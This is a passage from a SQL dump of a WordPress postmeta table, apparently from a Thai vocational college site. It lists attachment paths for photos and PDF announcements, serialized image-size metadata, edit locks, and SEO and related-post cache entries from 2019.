:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12091, 5378, '_jetpack_related_posts_cache', 'a:1:{s:32:\"2d3a657e42fc1a6375f59e95d07c355b\";a:2:{s:7:\"expires\";i:1575662413;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6068;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:6150;}}}}'),
(12092, 5385, '_edit_lock', '1554090666:3'),
(12093, 5385, '_edit_last', '3'),
(12094, 5386, '_wp_attached_file', '2019/04/55604905_786227451753445_938901068044042240_o.jpg'),
(12095, 5386, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:57:\"2019/04/55604905_786227451753445_938901068044042240_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"55604905_786227451753445_938901068044042240_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"55604905_786227451753445_938901068044042240_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"55604905_786227451753445_938901068044042240_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"55604905_786227451753445_938901068044042240_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"55604905_786227451753445_938901068044042240_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12096, 5385, '_thumbnail_id', '5386'),
(12100, 5385, '_hide_featured', NULL),
(12101, 5385, '_yoast_wpseo_content_score', '30'),
(12102, 5385, '_yoast_wpseo_primary_category', '31'),
(12103, 5385, '_wpas_done_all', '1'),
(12104, 5388, '_edit_lock', '1554090667:3'),
(12105, 5388, '_edit_last', '3'),
(12106, 5385, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575353282;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5301;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:5994;}}}}'),
(12109, 5390, '_wp_attached_file', '2019/04/1-4-2562-10-09-22.png'),
(12110, 5390, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:508;s:6:\"height\";i:798;s:4:\"file\";s:29:\"2019/04/1-4-2562-10-09-22.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-4-2562-10-09-22-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"1-4-2562-10-09-22-191x300.png\";s:5:\"width\";i:191;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"1-4-2562-10-09-22-191x300.png\";s:5:\"width\";i:191;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12111, 5391, '_wp_attached_file', '2019/04/55802337_786935181682672_3853128127471419392_o.jpg'),
(12112, 5391, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/04/55802337_786935181682672_3853128127471419392_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"55802337_786935181682672_3853128127471419392_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"55802337_786935181682672_3853128127471419392_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"55802337_786935181682672_3853128127471419392_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"55802337_786935181682672_3853128127471419392_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"55802337_786935181682672_3853128127471419392_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12113, 5388, '_thumbnail_id', '5391'),
(12117, 5388, '_hide_featured', NULL),
(12118, 5388, '_yoast_wpseo_content_score', '30'),
(12119, 5388, '_yoast_wpseo_primary_category', '31'),
(12120, 5388, '_wpas_done_all', '1'),
(12121, 5393, '_edit_lock', '1554104648:3'),
(12122, 5393, '_edit_last', '3'),
(12123, 5394, '_wp_attached_file', '2019/04/ประกาศ-รายชื่อผู้มีสิทธิ์สอบคัดเลือก-ทำหน้าที่-ครูอัตราจ้าง.pdf'),
(12127, 5393, '_hide_featured', NULL),
(12128, 5393, '_yoast_wpseo_content_score', '60'),
(12129, 5393, '_yoast_wpseo_primary_category', '3'),
(12130, 5393, '_wpas_done_all', '1'),
(12131, 5393, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575201873;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(12132, 5388, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574871440;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6057;}i:1;a:1:{s:2:\"id\";i:6037;}i:2;a:1:{s:2:\"id\";i:6060;}}}}'),
(12135, 5398, '_menu_item_type', 'custom'),
(12136, 5398, '_menu_item_menu_item_parent', '1115'),
(12137, 5398, '_menu_item_object_id', '5398'),
(12138, 5398, '_menu_item_object', 'custom'),
(12139, 5398, '_menu_item_target', ''),
(12140, 5398, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(12141, 5398, '_menu_item_xfn', ''),
(12142, 5398, '_menu_item_url', '/เมคคาทรอนิกส์และหุ่นยน'),
(12144, 5399, '_edit_lock', '1624865579:14'),
(12145, 5399, '_edit_last', '14'),
(12146, 5399, '_hide_featured', NULL),
(12147, 5399, '_yoast_wpseo_content_score', '30'),
(12148, 5402, '_wp_attached_file', '2019/04/3-4-2562-15-13-05.png'),
(12149, 5402, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:206;s:6:\"height\";i:257;s:4:\"file\";s:29:\"2019/04/3-4-2562-15-13-05.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-13-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12150, 5404, '_wp_attached_file', '2019/04/3-4-2562-15-14-27.png'),
(12151, 5404, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:610;s:6:\"height\";i:161;s:4:\"file\";s:29:\"2019/04/3-4-2562-15-14-27.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-14-27-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"3-4-2562-15-14-27-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-14-27-400x106.png\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12152, 5406, '_wp_attached_file', '2019/04/3-4-2562-15-25-07.png'),
(12153, 5406, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1007;s:6:\"height\";i:658;s:4:\"file\";s:29:\"2019/04/3-4-2562-15-25-07.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-07-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-07-768x502.png\";s:5:\"width\";i:768;s:6:\"height\";i:502;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-07-400x261.png\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12154, 5408, '_wp_attached_file', '2019/04/3-4-2562-15-25-45.png'),
(12155, 5408, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:354;s:4:\"file\";s:29:\"2019/04/3-4-2562-15-25-45.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-45-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-45-300x106.png\";s:5:\"width\";i:300;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-45-768x272.png\";s:5:\"width\";i:768;s:6:\"height\";i:272;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-4-2562-15-25-45-400x142.png\";s:5:\"width\";i:400;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12156, 1912, '_yoast_wpseo_content_score', '30'),
(12157, 5414, '_edit_lock', '1554350508:12'),
(12158, 5414, '_edit_last', '12'),
(12159, 5415, '_wp_attached_file', '2019/04/ประกาศ-รายชื่อผู้ผ่านการสอบคัดเลือกครูอัตราจ้าง.pdf'),
(12163, 5414, '_hide_featured', NULL),
(12164, 5414, '_yoast_wpseo_content_score', '60'),
(12165, 5414, '_yoast_wpseo_primary_category', '3'),
(12166, 5414, '_wpas_done_all', '1'),
(12167, 5414, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575662031;s:7:\"payload\";a:0:{}}}'),
(12170, 5420, '_wp_attached_file', '2019/04/การอบรมอาชีวพรีเมี่ยม@สุพรรณ.pdf'),
(12203, 5428, '_edit_lock', '1577088154:14'),
(12204, 5428, '_edit_last', '12'),
(12205, 5428, '_hide_featured', NULL),
(12206, 5428, '_yoast_wpseo_content_score', '60'),
(12234, 5442, '_wp_attached_file', '2019/04/aa.jpg'),
(12235, 5442, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:640;s:6:\"height\";i:416;s:4:\"file\";s:14:\"2019/04/aa.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"aa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"aa-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"aa-400x260.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12249, 5445, '_wp_attached_file', '2019/04/aa-1.jpg'),
(12250, 5445, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:640;s:6:\"height\";i:416;s:4:\"file\";s:16:\"2019/04/aa-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"aa-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"aa-1-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"aa-1-400x260.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12272, 5449, '_wp_attached_file', '2019/04/8-5-2561-10-33-02.jpg'),
(12273, 5449, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2019/04/8-5-2561-10-33-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"8-5-2561-10-33-02-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-02-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12274, 2388, '_yoast_wpseo_content_score', '30'),
(12275, 5451, '_wp_attached_file', '2019/04/tanit.jpg'),
(12276, 5451, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:209;s:6:\"height\";i:282;s:4:\"file\";s:17:\"2019/04/tanit.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"tanit-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12279, 5456, '_wp_attached_file', '2019/04/ประกาศรับสมัครครูอัตราจ้าง.pdf'),
(12281, 5458, '_edit_lock', '1555664962:12'),
(12282, 5458, '_edit_last', '12'),
(12287, 5458, '_hide_featured', NULL),
(12288, 5458, '_yoast_wpseo_content_score', '60'),
(12289, 5458, '_yoast_wpseo_primary_category', '3'),
(12290, 5458, '_wpas_done_all', '1'),
(12291, 5458, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575665330;s:7:\"payload\";a:0:{}}}'),
(12294, 5462, '_wp_attached_file', '2019/04/ประกาศรับสมัครเจ้าหน้าที่.pdf'),
(12309, 5465, '_edit_lock', '1555665601:12'),
(12310, 5465, '_edit_last', '12'),
(12315, 5465, '_hide_featured', NULL),
(12316, 5465, '_yoast_wpseo_content_score', '60'),
(12317, 5465, '_yoast_wpseo_primary_category', '3'),
(12318, 5465, '_wpas_done_all', '1'),
(12319, 5465, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575646655;s:7:\"payload\";a:0:{}}}'),
(12320, 5469, '_edit_lock', '1556899058:12'),
(12321, 5470, '_wp_attached_file', '2019/04/กำหนดลงทะเบียน1-62_Page_1.jpg'),
(12322, 5470, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:65:\"2019/04/กำหนดลงทะเบียน1-62_Page_1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:66:\"กำหนดลงทะเบียน1-62_Page_1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:66:\"กำหนดลงทะเบียน1-62_Page_1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12323, 5471, '_wp_attached_file', '2019/04/กำหนดลงทะเบียน1-62_Page_2.jpg'),
(12324, 5471, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:65:\"2019/04/กำหนดลงทะเบียน1-62_Page_2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:66:\"กำหนดลงทะเบียน1-62_Page_2-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:66:\"กำหนดลงทะเบียน1-62_Page_2-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:65:\"กำหนดลงทะเบียน1-62_Page_2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12325, 5469, '_edit_last', '12'),
(12329, 5469, '_hide_featured', NULL),
(12330, 5469, '_yoast_wpseo_content_score', '30'),
(12331, 5469, '_yoast_wpseo_primary_category', '3'),
(12332, 5469, '_wpas_done_all', '1'),
(12333, 5469, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575683975;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4093;}i:1;a:1:{s:2:\"id\";i:4020;}i:2;a:1:{s:2:\"id\";i:5172;}}}}'),
(12334, 5473, '_edit_lock', '1556008111:3'),
(12335, 5474, '_wp_attached_file', '2019/04/พ้นสภาพเกรดไม่ถึงเกณฑ์2-61.pdf'),
(12336, 5473, '_edit_last', '3'),
(12340, 5473, '_hide_featured', NULL),
(12341, 5473, '_yoast_wpseo_content_score', '60'),
(12342, 5473, '_yoast_wpseo_primary_category', '3'),
(12343, 5473, '_wpas_done_all', '1'),
(12344, 5473, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575642402;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:5172;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(12345, 5477, '_edit_lock', '1556074756:13'),
(12346, 5477, '_edit_last', '13'),
(12347, 5478, '_wp_attached_file', '2019/04/24-4-2562-9-59-16.png'),
(12348, 5478, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:513;s:6:\"height\";i:728;s:4:\"file\";s:29:\"2019/04/24-4-2562-9-59-16.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"24-4-2562-9-59-16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"24-4-2562-9-59-16-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"24-4-2562-9-59-16-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12349, 5479, '_wp_attached_file', '2019/04/56162078_789682304741293_6079661520432660480_o.jpg'),
